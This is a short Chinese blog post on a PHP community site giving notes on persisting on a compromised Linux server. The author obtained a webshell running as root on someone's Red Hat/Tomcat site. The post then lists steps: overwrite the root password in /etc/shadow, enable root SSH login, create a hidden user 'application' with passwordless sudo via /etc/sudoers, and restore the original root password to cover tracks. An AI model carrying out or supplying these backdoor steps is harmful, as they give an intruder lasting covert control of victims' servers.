首页    技术博客    PHP教程    数据库技术    前端开发   HTML5    Nginx    php论坛
新用户注册 | 会员登录
加入会员,解锁专属内容
取消
热门标签 | HotTags
当前位置:  开发笔记 > 运维 > 正文

webshell以root权限运行的linux提权笔记

作者:matt | 来源:互联网 | 2017-11-12 16:09
某日拿到某站webshell,redhat系统,Tomcat程序是root身份启动的,webshell当然也拥有root权限。1.webshell直接替换root密码:etcshadow记得备份2.允许root通过ssh登陆:etcsshsshd_configPermitRootLoginyes#允许root登陆3.重启ssh服务ser

某日拿到某站webshell,redhat 系统,Tomcat程序是root身份启动的,webshell当然也拥有root权限。
 

1.webshell直接替换root密码: /etc/shadow // 记得备份
 

2.允许root通过ssh登陆: /etc/ssh/sshd_config
PermitRootLogin yes #允许root登陆
 

3.重启ssh服务 service ssh restart
 

4.以root身份登陆ssh,增加一个用户
useradd application
passwd // 根据提示设置密码
 

5.更改application用户运行su不需密码
chmod +w /etc/sudoers // 增加写入权限,默认只读
修改/etc/sudoers
vi /etc/sudoers
加入application ALL=(ALL) NOPASSWD: ALL
 

6.把root密码修改回原样,禁止root登陆。完工


推荐阅读
author-avatar
matt
这个家伙很懒,什么也没留下!
Tags | 热门标签
RankList | 热门文章
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有